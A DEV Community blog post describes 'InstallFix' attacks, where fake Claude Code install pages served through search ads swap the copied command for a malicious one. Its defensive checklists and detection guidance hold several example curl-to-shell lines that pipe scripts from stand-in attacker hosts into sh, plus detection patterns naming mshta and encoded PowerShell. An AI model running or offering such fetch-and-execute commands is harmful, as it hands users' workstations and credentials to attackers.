DEV Community

Cover image for Fake AI Installers: When "Installing Claude" Turns Into Running Malware
Nikolay Kuziev
Nikolay Kuziev

Posted on

Fake AI Installers: When "Installing Claude" Turns Into Running Malware

A practical security case study about fake AI tool install pages, clipboard command substitution, and why copy-pasting terminal commands from search results has become a real workstation risk.

Introduction

This is not a Claude vulnerability.

It is not a story about "AI tools are dangerous" either.

It is about a much more ordinary problem:

developers are used to copying install commands from the browser into the terminal
Enter fullscreen mode Exit fullscreen mode

Attackers are now abusing that habit.

The old phishing pattern was familiar: a fake login page, a malicious attachment, a suspicious document, a password reset email.

The newer developer-focused pattern looks different:

fake documentation
fake install page
fake copy button
malware instead of install.sh
Enter fullscreen mode Exit fullscreen mode

The victim does not need to open a suspicious attachment.

They search for an AI development tool, click a sponsored result, land on a page that looks like documentation, copy a terminal command, and run it.

It feels like installing a normal CLI tool.

But it can be the start of a malware infection chain.

The attack pattern: InstallFix

Push Security described this pattern as InstallFix.

The idea is simple:

  1. An attacker clones an installation page for a popular developer tool.
  2. The page looks close enough to legitimate documentation.
  3. The install commands are modified.
  4. Traffic is driven through Google Ads or other malvertising channels.
  5. The user copies and runs the command manually.
  6. The "installer" executes attacker-controlled code.

This is related to ClickFix, but the pretext is different.

In ClickFix, the user is often tricked into "fixing" something: a CAPTCHA, a browser issue, a broken access flow, or a fake system error.

In InstallFix, nothing is broken.

The user already wants to install legitimate software.

That is what makes the attack so effective.

Why AI tools are a good lure

AI developer tooling is moving fast.

People are installing Claude Code, ChatGPT-related tools, Cursor extensions, MCP servers, local agents, CLI wrappers, browser extensions, desktop clients, and small automation packages around LLM workflows.

In many teams, this does not always go through a formal internal approval process.

The real workflow often looks like this:

a colleague mentions a tool
someone searches for the install guide
the first result looks right
they copy the command
they run it
Enter fullscreen mode Exit fullscreen mode

For an attacker, this is almost perfect:

  • the tool is popular and timely;
  • users expect to see terminal commands;
  • sponsored results can appear above organic results;
  • documentation pages are easy to imitate;
  • the install command can look normal;
  • the user may be redirected to a real page afterward and notice nothing.

Kaspersky and Push Security have both described campaigns where fake install pages were promoted through search ads and imitated installation instructions for Claude Code or similar AI tooling.

The important point is this:

the lure is not the AI model itself
the lure is the developer installation workflow
Enter fullscreen mode Exit fullscreen mode

A realistic case: installing Claude through install.sh

Imagine a developer wants to install an AI coding assistant.

They search for:

Claude Code install
Enter fullscreen mode Exit fullscreen mode

At the top of the search results, they see a sponsored link.

The domain looks plausible:

claude-code-docs.example
claude-code-install.example
claude-update.example
Enter fullscreen mode Exit fullscreen mode

The page looks like documentation:

  • logo;
  • sidebar;
  • quickstart section;
  • OS tabs for macOS, Linux, and Windows;
  • a copy button;
  • a short terminal command.

On the page, the visible command may look like this:

curl -fsSL https://claude.ai/install.sh | sh
Enter fullscreen mode Exit fullscreen mode

But the visible command and the clipboard command do not have to be the same.

For example, the page can display:

curl -fsSL https://claude.ai/install.sh | sh
Enter fullscreen mode Exit fullscreen mode

But after the user clicks Copy, the clipboard may contain:

curl -fsSL https://download.example.invalid/install.sh | sh
Enter fullscreen mode Exit fullscreen mode

Or:

curl -fsSL https://download.example.invalid/bootstrap | sh
Enter fullscreen mode Exit fullscreen mode

In a real campaign, the attacker domain would be more convincing.

The point is not the exact URL.

The point is that the user trusts the page UI instead of verifying the pasted command before pressing Enter.

Where JavaScript comes in

Most documentation pages show a command as text and provide a Copy button.

That button can copy a value that is different from the text the user sees.

Conceptually:

visible text:
  curl -fsSL https://official.example/install.sh | sh

clipboard value:
  curl -fsSL https://attacker.example/install.sh | sh
Enter fullscreen mode Exit fullscreen mode

An attacker can make this more subtle:

  • show a legitimate-looking domain in the page;
  • copy an attacker-controlled URL into the clipboard;
  • add base64 decoding;
  • add silent flags;
  • choose payloads based on OS;
  • change the command only for selected geographies or organizations;
  • change the copied command only when the visit comes from an ad campaign.

So "I saw the correct command on the page" is not enough.

The only thing that matters is what is actually pasted into the terminal.

That sounds basic.

But this is exactly the kind of basic thing that breaks under speed and trust.

Windows scenario: mshta and PowerShell

On Windows, these campaigns often use living-off-the-land binaries.

A simplified infection chain can look like this:

browser / user paste
  -> PowerShell
  -> mshta.exe
  -> remote HTA or script
  -> cmd.exe or PowerShell stager
  -> fileless payload
  -> persistence or credential theft
Enter fullscreen mode Exit fullscreen mode

In campaigns around fake Claude Code installers, researchers observed patterns involving mshta.exe, PowerShell, staged execution, obfuscation, AMSI bypass attempts, browser data theft, and infostealer behavior.

The key point is that the victim does not need to download and double-click a suspicious setup.exe.

They can run one copied command, and that command can fetch the rest.

From a detection perspective, this may look less like "a malicious file from email" and more like user-driven terminal activity.

That is why behavior matters.

macOS and Linux scenario: curl-to-shell

On macOS and Linux, the familiar pattern is:

curl -fsSL https://example.com/install.sh | sh
Enter fullscreen mode Exit fullscreen mode

or:

curl -fsSL https://example.com/install.sh | zsh
Enter fullscreen mode Exit fullscreen mode

This is convenient.

That is exactly why it is dangerous.

The command means:

download a remote script and execute it immediately
Enter fullscreen mode Exit fullscreen mode

If the domain is official and the script is expected, this is a common developer workflow.

If the domain is replaced, this becomes remote code execution performed by the user.

The problem is not curl.

The problem is that the trust boundary becomes:

I trust this web page and its copy button
Enter fullscreen mode Exit fullscreen mode

That is a weak boundary.

Why sponsored search results make this worse

Many users still treat Google Ads as a sign of legitimacy.

The mental shortcut is:

if it is at the top of Google, it is probably fine
Enter fullscreen mode Exit fullscreen mode

That is a dangerous shortcut.

Malvertising works because the user initiates the search. There is no phishing email. No strange attachment. No random message from a stranger.

The user wanted to install the tool.

So they are less suspicious.

This is especially risky in a corporate environment.

A developer workstation may contain:

  • source code;
  • SSH keys;
  • browser sessions;
  • password manager sessions;
  • Git credentials;
  • cloud CLI tokens;
  • kubeconfig files;
  • CI/CD access;
  • internal documentation;
  • VPN access.

An infostealer on that machine is not just "one infected laptop".

It can become an entry point into the organization.

How this differs from a classic fake installer

A classic fake installer looks like this:

download setup.exe
run installer
get malware
Enter fullscreen mode Exit fullscreen mode

InstallFix is more subtle.

It abuses a normal developer habit:

documentation says copy this command
I copy the command
I run the command
Enter fullscreen mode Exit fullscreen mode

For a developer, this does not feel like running a random executable.

It feels like installing a CLI tool from documentation.

That is why security awareness should not stop at:

do not open suspicious executables
Enter fullscreen mode Exit fullscreen mode

It also needs to say:

terminal commands copied from the browser are code execution
Enter fullscreen mode Exit fullscreen mode

What to check before running install commands

A practical checklist for users:

  1. Do not use sponsored results to install developer tools.
  2. Open official documentation from a known source.
  3. Check the domain inside the command, not only the browser address bar.
  4. After pasting, read the command before pressing Enter.
  5. Avoid curl | sh when you do not understand what will be downloaded.
  6. When possible, download the script first and inspect it:
curl -fsSL https://official.example/install.sh -o install.sh
less install.sh
sh install.sh
Enter fullscreen mode Exit fullscreen mode
  1. Use a disposable VM or container for tools you do not trust yet.
  2. Do not test new AI tools on a workstation that holds production secrets.

This is not about paranoia.

It is about treating remote installation commands as code execution.

Because that is what they are.

What teams can do

Awareness alone is not enough.

I would add a few practical controls.

Maintain an approved tool list

Teams should know where approved developer tools come from.

Example:

Claude Code:
  official docs: https://docs.anthropic.com/...
  expected package: @anthropic-ai/claude-code

Node.js:
  official site: https://nodejs.org/
  internal mirror: https://nexus.example.com/...

Homebrew:
  official site: https://brew.sh/
Enter fullscreen mode Exit fullscreen mode

If someone finds an installation guide through a sponsored ad, that should be a reason to stop.

Provide internal installation docs

For common tools, internal documentation helps a lot.

It should answer:

  • how to install the tool;
  • which command is approved;
  • which domain is expected;
  • whether a hash or signature should be checked;
  • where to ask for help if the install fails.

This matters especially for AI tools.

People will try them anyway.

If the company does not provide a safe path, employees will find an unsafe path.

Use DNS and web controls

Useful controls include blocking or flagging:

  • newly registered domains;
  • suspicious lookalike domains;
  • known malicious domains;
  • ad-delivered installer pages;
  • direct access to suspicious payload hosts.

This will not stop every campaign.

Attackers rotate infrastructure quickly.

But it is still a useful layer.

Endpoint detections

On Windows, I would monitor for patterns such as:

browser -> powershell
browser -> cmd
powershell -> mshta
mshta -> cmd
mshta -> powershell
PowerShell with encoded commands
PowerShell AMSI tampering
new scheduled task near install activity
unexpected outbound traffic from scripting hosts
Enter fullscreen mode Exit fullscreen mode

On macOS and Linux:

shell spawned from browser-adjacent activity
curl or wget downloading scripts to /tmp
chmod +x on a fresh download
execution from /tmp
unexpected launch agents
unexpected shell profile modification
Enter fullscreen mode Exit fullscreen mode

Context matters.

curl is not malware.

PowerShell is not malware.

But a browser-driven install flow, a suspicious domain, an obfuscated command, and persistence behavior together are a different story.

Why AppSec and DevSecOps should care

At first glance, this looks like endpoint security and awareness.

But it matters for AppSec and DevSecOps too.

Developer workstations often have access to the software supply chain:

  • Git repositories;
  • package registries;
  • container registries;
  • CI/CD variables;
  • deployment configuration;
  • signing keys;
  • cloud credentials;
  • kubeconfig files.

If an infostealer gets browser sessions or local credentials, the next step can be a supply chain incident.

That is why Secure SDLC should include workstation and tooling hygiene:

  • approved source lists for developer tools;
  • no installation from sponsored results;
  • internal installation guides;
  • sandboxing for new AI tools;
  • endpoint telemetry on developer machines;
  • least-privilege developer tokens;
  • short-lived credentials;
  • separate production credentials;
  • regular review of local secrets and kubeconfigs.

This is not about fighting Claude.

It is about developer workstation security.

Incident response checklist

If someone already ran a suspicious install command:

  1. Stop using the workstation.
  2. Isolate the endpoint from the network or through EDR.
  3. Preserve the command, URL, browser history, and time window.
  4. Review the process tree: browser, shell, PowerShell, mshta.exe, cmd.exe, curl, zsh.
  5. Check persistence: scheduled tasks, launch agents, startup items, shell profiles.
  6. Review outbound connections.
  7. Treat browser sessions and tokens as potentially compromised.
  8. Rotate credentials:
    • Git;
    • GitHub or GitLab;
    • cloud;
    • container registry;
    • package registry;
    • password manager session, if relevant.
  9. Review recent repository and CI/CD activity.
  10. Rebuild the workstation if cleanup confidence is low.

If this is an infostealer, deleting one file is not enough.

Credentials may already be gone.

What this does not solve

Checking install commands does not replace:

  • endpoint protection;
  • DNS filtering;
  • secure web gateways;
  • least privilege;
  • credential rotation;
  • EDR telemetry;
  • software allowlisting;
  • internal package mirrors;
  • developer security training.

It solves one specific gap:

people should not blindly execute code from a page they reached through an ad
Enter fullscreen mode Exit fullscreen mode

That gap is small, but it is real.

Closing

InstallFix is uncomfortable because it does not need a sophisticated exploit.

It abuses normal developer behavior.

We trained people to do this:

copy command from docs
paste into terminal
press Enter
Enter fullscreen mode Exit fullscreen mode

Attackers replaced the docs.

Or the command.

Or the clipboard value.

That can be enough.

So the rule I use is simple:

an install command from the browser is code execution
Enter fullscreen mode Exit fullscreen mode

Treat it like code:

  • verify the source;
  • verify the domain;
  • read the command after pasting;
  • do not trust sponsored results;
  • do not run unknown install.sh scripts on workstations with secrets;
  • provide an approved internal path for popular tools.

This is a small habit.

But it can be the difference between installing a developer tool and running an infostealer on a developer workstation.

References

Top comments (0)